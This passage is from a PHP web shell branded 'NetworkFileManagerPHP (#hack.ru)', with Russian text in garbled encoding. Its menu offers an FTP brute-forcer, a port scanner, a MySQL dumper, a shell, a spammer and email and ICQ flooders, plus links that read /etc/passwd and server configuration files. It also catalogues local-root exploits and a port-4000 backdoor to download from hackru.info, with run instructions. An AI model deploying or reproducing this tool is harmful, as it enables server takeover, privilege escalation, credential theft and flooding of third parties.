+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+
+/* îïöèè êîí÷èëèñü, ïîø¸ë äèçàéí */
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+$style=<<<style
+<style>
+a.menu   {
+color: #ffffcc;
+text-decoration:none;
+font-family: Times New Roman;
+font-weight: bold;
+     }
+a.menu:hover   {
+color: #FF0000;
+font-family: Times New Roman;
+text-decoration: none
+font-weight: bold;
+          }
+a   {
+color: #000000;
+text-decoration:none;
+font-family: Tahoma;
+font-size: 11px;
+     }
+a:hover   {
+color: #184984;
+font-family: Tahoma;
+text-decoration: underline
+font-size: 11px;
+          }
+td.up{
+color: #996600;
+font-family: Verdana;
+font-weight: normal;
+font-size: 11px;
+}
+.pagetitle {
+font-family: Arial, Helvetica, sans-serif; 
+color: #FFFFFF; 
+text-decoration: none; 
+font-size: 12px
+}
+.alert   {
+color: #FF0000;
+font-family: Tahoma;
+font-size: 11px;
+          }
+.button1 {
+font-size:11px;
+font-weight:bold;
+font-family:Verdana;
+background:#184984;
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+}
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+b {  font-weight: bold}
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+</style>
+style;
+
+/* ñòèëè òàáëèö */
+$style1=<<<table
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+table;
+$style2=<<<table_file
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+table_file;
+$style3=<<<table_dir
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+table_dir;
+$style4=<<<table_files
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+table_files;
+$style_button=<<<button
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+button;
+$style_open=<<<open
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+open;
+$style_close=<<<close
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+close;
+$ins=<<<ins
+<script>
+function ins(text){
+document.hackru.chars_de.value+=text;
+document.hackru.chars_de.focus();
+}
+</script>
+ins;
+
+/* Ôîðìà îòïðàâêè*/
+$form = "
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr>
+  <td align=center class=pagetitle colspan=2><b>Âîïðîñû ïî ñêðèïòó NetworkFileManagerPHP</b></font></b></td>
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+     <tr>
+  <td colspan=2 align=center class=pagetitle><b>Îáðàòíàÿ ñâÿçü:</b></td>
+  </tr>
+    <tr>
+      <td width='250' class=pagetitle><b>Âàøå èìÿ:</b></td>
+      <td width='250' class=pagetitle>
+        <input type='text' name='name' size='40' class='inputbox'></td>
+      </tr>
+    <tr>
+      <td width='250' class=pagetitle><b>Email:</b></td>
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+    </tr>
+  
+  <tr>
+  <td colspan=2 align=center class=pagetitle><b>
+  Âàøè âîïðîñû è ïîæåëàíèÿ:
+  </b></font></b></td>
+  </tr>
+  <tr>
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+  <tr>
+  <td align=right><input type='submit' value='Äàâè' name='B1' class=button1 $style_button></td>
+      <td align=left><input type='reset' value='Î÷èñòèòü' name='B2' class=button1 $style_button></td>
+      </tr>
+</form></table><br>
+";
+
+	
+
+/* Ôîðìà HTML */
+$HTML=<<<html
+<html>
+<head>
+<title>$title $ver</title>
+$meta
+$style
+$ins
+</head>
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Âåðñèÿ: <b>$ver</b> </td></tr>
+<tr><td align=center colspan=6 class=pagetitle bgcolor=#76A8AB>Ñêðèïò äëÿ àäìèíèñòðèðîâàíèÿ ñâîåãî ñàéòà è íå òîëüêî...</td></tr>
+<tr>
+<td class=pagetitle align=center width='85%'><font color=#76A8AB><b>Ïîìîùü ïî ñêðèïòó:</b></font></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Âîïðîñû</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:Îïèñàíèå</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Îáíîâëåíèÿ</a>&nbsp;&nbsp;</td>
+</tr>
+
+<tr>
+<td class=pagetitle align=center width='85%' ><font color=#FFFF99><b>Ñåòåâîé ñîôò:</b></font></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Ñêàí ïîðòîâ</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:Áðóòåð ÔÒÏ</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Àðõèâàöèÿ ïàïîê</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Äàìï Mysql</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=del'>.:Óäàëèòü NFM</a>&nbsp;&nbsp;</td>
+</tr>
+<tr>
+<td class=pagetitle align=center width='85%' ><font color=#9BD09B><b>Äîñòóï ê ýêñïëîéòàì:</b></font></td>
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:îòêðûòü øåë</a>&nbsp;&nbsp;</td>
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Explots</a>&nbsp;&nbsp;</td>
+<tr>
+<td class=pagetitle align=center width='85%'><font color=#AB879C><b>Õàêåðñêèé ñîôò:</b></font></td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Øèôðîâêà</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Ðàñøèôðîâêà</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Ñïàìåð</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Óäàëåííàÿ çàãðóçêà</a>&nbsp;&nbsp;</td>
+</tr>
+<td class=pagetitle align=center width=85%><font color=#FF3300><b>Ñîôò íàêàçàíèÿ:</b></font></td>
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=flud'>.:Ôëóä Email</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=fludicq'>.:Ôëóä ICQ</a>&nbsp;&nbsp;</td>
+<tr>
+<tr>
+<td class=pagetitle align=center width='85%' colspan=6 bgcolor=#76A8AB>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+</tr>
+<tr>
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='http://hackru.info/bugtraq'>.:Bugtraq</td>
+
+</tr>
+</table>
+html;
+/* çàäàåì ðàíäîìíûå íàçâàíèÿ ôàéëîâ àðõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+/* çàäàåì ïóòü ê ñàéòó, ãäå ëåæàò ïóáëè÷íûå ýêñïëîéòû*/
+$public_site = "http://hackru.info/adm/exploits/public_exploits/"; 
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+/* Ïóáëè÷íûå ýêñïëîéòû */
+$public[1] = "s"; // øåë
+$title_ex[1] = "
+&nbsp;&nbsp;bindtty.c - óäàëåííûé øåë ñ ïðàâàìè apache, äàííûé áàêäîð óæå ñêîìïèëèðîâàí è íàñòðîåí íà 4000 ïîðò<br>
+<dd><b>Çàïóñê:</b> ./s<br>
+&nbsp;&nbsp;&nbsp;Êîíåêòèòñÿ ëó÷øå òåëíåò êëèåíòîì ñàìûå ëó÷øèå ýòî <u><b>putty</b></u> è <u><b>SecureCRT</b></u>
+";
+$public[2] = "m"; // ìðåìàï
+$title_ex[2] = "
+&nbsp;&nbsp;MREMAP - ïîçâîëÿåò ïîëó÷èòü ëîêàëüíî ïðèâèëåãèè ROOT, èñïîëüçóåò ïåðåïîëíåíèå ïàìÿòè.<br>
+<dd><b>Çàïóñê:</b> ./m<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$public[3] = "p"; // ptrace
+$title_ex[3] = "
+&nbsp;&nbsp;PTRACE - ñòàðûé äîáðûé ýêñïëîéò, ðàáîòàåò òàêæå êàê è mremap<br>
+<dd><b>Çàïóñê:</b> ./p<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+$title_ex[4] = "
+&nbsp;&nbsp;psyBNC - ïîñëåäíÿÿ âåðñèÿ, ïîïóëÿðíîãî áàóí÷åðà äëÿ IRC<br>
+<dd><b>Ðàçàðõèâàöèÿ:</b> tar -zxf psyBNC2.3.2-4.tar.gz // ïîÿâèòñÿ ïàïêà <u>psybnc</u><br>
+<dd><b>Âõîä è çàïóñê:</b> make // óñòàíàâëèâàåì íà äàííóþ îñü psybnc // ./psybnc // ìîæíî ïîìåíÿòü êîíôèã ñ ïîìîùüþ nfm<br>
+&nbsp;&nbsp;&nbsp;Ìîæíî çàïóñêàòü ñ ïðàâàìè àïà÷à!!! Òîëüêî ñìîòðèòå ÷òîáû íå áûëî ôàåðâîëà!!!
+";
+/* Ïðèâàòíûå ýêñïëîéòû */
+$private[1] = "brk"; // localroot root linux 2.4.*
+$title_exp[1] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è mremap<br>
+<dd><b>Çàïóñê:</b> ./brk<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+$title_exp[2] = "
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ãäå çàïóùåí ñåðâèñ Glftpd <br>
+<dd>Èìååòñÿ 2 ôàéëà: <b>dupescan</b> è <b>glftpd</b> Äëÿ ïîëó÷åíèÿ root ïðàâ, íåîáõîäèìî çàïèñàòü ôàéë dupescan â äåðèêòîðèþ<br>
+/glftpd/bin/ êîìàíäîé <u>cp dupescan /glftpd/bin/</u>, ïîñëå ÷åãî èç bash øåëà çàïóñòèòü <u>./glftpd</u>. Ðóò âàì îáåñïå÷åí!!!<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[3] = "glftpd";
+$title_exp[3] = "
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ãäå çàïóùåí ñåðâèñ Glftpd <br>
+Âòîðàÿ ÷àñòü ýêñïëîéòà<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[4] = "sortrace";
+$title_exp[4] = "
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ÷åðåç ñåðâèñ traceroute<br>
+<dd><b>Çàïóñê:</b> ./sortrace<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[5] = "root";
+$title_exp[5] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï<br>
+<dd><b>Çàïóñê:</b> ./root<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[6] = "sxp";
+$title_exp[6] = "
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï<br>
+<dd><b>Çàïóñê:</b> ./sxp<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[7] = "ptrace_kmod";
+$title_exp[7] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï, èñïîëüçóåò áàãó ÷åðåç ptarce + kmod<br>
+<dd><b>Çàïóñê:</b> ./ptrace_kmod<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[8] = "mr1_a";
+$title_exp[8] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è ìðåìàï, ðàáîòàåò òàêæå êàê è ìðåìàï<br>
+<dd><b>Çàïóñê:</b> ./mr1_a<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+/* çàäàåì ïóòü ê ñàéòó, ãäå ëåæàò ïðèâàòíûå ýêñïëîéòû */
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+endif;
+
+/* Äàëüøå íè÷åãî íå èçìåíÿòü âî èçáåæàíèè íåðàáîòîñïîñîáíîñòè ñêðèïòà */
+global $action,$tm,$cm;
+
+function getdir() {
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+ $st = getcwd();
+ $st = str_replace("\\","/",$st);
+ $j = 0;
+ $gdir = array();
+ $gsub = array();
+ print("<br>");
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+  if ($st[$i] != "/") {
+   $gdir[$j] = $gdir[$j].$st[$i];
+   $gsub[$j] = $gsub[$j].$st[$i];
+  } else {
+   $gdir[$j] = $gdir[$j]."/";
+   $gsub[$j] = $gsub[$j]."/";
+   $gdir[$j+1] = $gdir[$j];
+   $j++;
+  }
+ }
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Òåêóùàÿ äèðåêòîðèÿ: </b>");
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+ $free = tinhbyte(diskfreespace("./"));
+ print("</td></tr><tr><td align=left><b>&nbsp;&nbsp;Äîñòóïíîå äèñêîâîå ïðîñòðàíñòâî</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+ print("<tr><td align=left><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+ print("<tr><td align=left><b>&nbsp;&nbsp;Âàø IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr>");
+ print("<tr><td align=left><b>&nbsp;&nbsp;Èíôà î æåëåçå:(GHz)</b> ".exec("cat /proc/cpuinfo | grep GHz")."</td></tr>");
+ print("<tr><td align=left><b><b>&nbsp;&nbsp;Èíôà î æåëåçå:(MHz)</b> ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+ print("<tr><td align=left><b>&nbsp; ".exec("id")."</b></td></tr></table><br>");
+
+}
+
+function tinhbyte($filesize) {
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+ else { $filesize = $filesize . ""; }
+ return $filesize;
+}
+
+function permissions($mode) {
+ $perms  = ($mode & 00400) ? "r" : "-";
+ $perms .= ($mode & 00200) ? "w" : "-";
+ $perms .= ($mode & 00100) ? "x" : "-";
+ $perms .= ($mode & 00040) ? "r" : "-";
+ $perms .= ($mode & 00020) ? "w" : "-";
+ $perms .= ($mode & 00010) ? "x" : "-";
+ $perms .= ($mode & 00004) ? "r" : "-";
+ $perms .= ($mode & 00002) ? "w" : "-";
+ $perms .= ($mode & 00001) ? "x" : "-";
+ return $perms;
+ 
+ 
+}
+
+function readdirdata($dir) {
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+ $files = array();
+ $dirs= array();
+ $open = @opendir($dir);
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Íåò äîñòóïà.</b></td></tr></table>";
+ else {
+  $open = opendir($dir);
+  while ($file = readdir($open)) {
+   $rec = $file;
+   $file = $dir."/".$file;
+   if (is_file($file)) $files[] = $rec;
+  }
+  sort($files);
+  $open = opendir($dir);
+  $i=0;
+  while ($dire = readdir($open)) {
+   if ( $dire != "." ) {
+    $rec = $dire;
+    $dire = $dir."/".$dire;
+    if (is_dir($dire)) {
+     $dirs[] = $rec;
+     $i++;
+    }
+   }
+  }
+  sort($dirs);
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Èìÿ</b></td><td width = '10%' align = 'center' class=pagetitle><b>Ðàçìåð</b></td><td width = '20%' align = 'center' class=pagetitle><b>Äàòà ñîçäàíèÿ</b></td><td width = '10%' align = 'center' class=pagetitle><b>Òèï</b></td><td width = '15%' align = 'center' class=pagetitle><b>Ïðàâà äîñòóïà</b></td><td width = '25%' align = 'center' class=pagetitle><b>Êîììåíòàðèè</b></td></tr></table>");
+  for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+    $type = 'Dir';
+    $fullpath = $dir."/".$dirs[$i];
+    $time = date("d/m/y H:i",filemtime($fullpath));
+    $perm = permissions(fileperms($fullpath));
+    $size = tinhbyte(filesize($fullpath));
+    $name = $dirs[$i];
+    $fullpath = $tm."/".$dirs[$i];
+    if ($perm[7] == "w" && $name != "..") $action = "
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Çàãðóçèòü</a></td>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Óäàëèòü</a></td>
+	</tr>
+	<tr>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Íîâàÿ äèðåêòîðèÿ</a></td>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Àðõèâàöèÿ ïàïêè</a></td>
+	</tr></table>";
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Òîëüêî ÷òåíèå</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Àðõèâàöèÿ ïàïêè</a></td></tr></table>";
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+   }
+  }
+  for ($i=0;$i<sizeof($files);$i++) {
+   $type = 'File';
+   $fullpath =  $dir."/".$files[$i];
+   $time = date("d/m/y H:i",filemtime($fullpath));
+   $perm = permissions(fileperms($fullpath));
+   $size = tinhbyte(filesize($fullpath));
+   $owner = @chown($fullpath, "nobody");
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>Ïðîñìîòð</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Ñêà÷êà</a></td></tr>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>Íà ìûëî</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Êîïèðîâàòü</a></td>
+   </tr></table>";
+   if ( $owner == "nobody" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Ðåäàêòèðîâàòü</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Óäàëèòü</a></td>
+   </tr></table>";
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+  }
+ }
+}
+
+function html() {
+global $ver,$meta,$style;
+echo "
+<html>
+<head>
+<title>NetworkFileManagerPHP</title>
+</head>
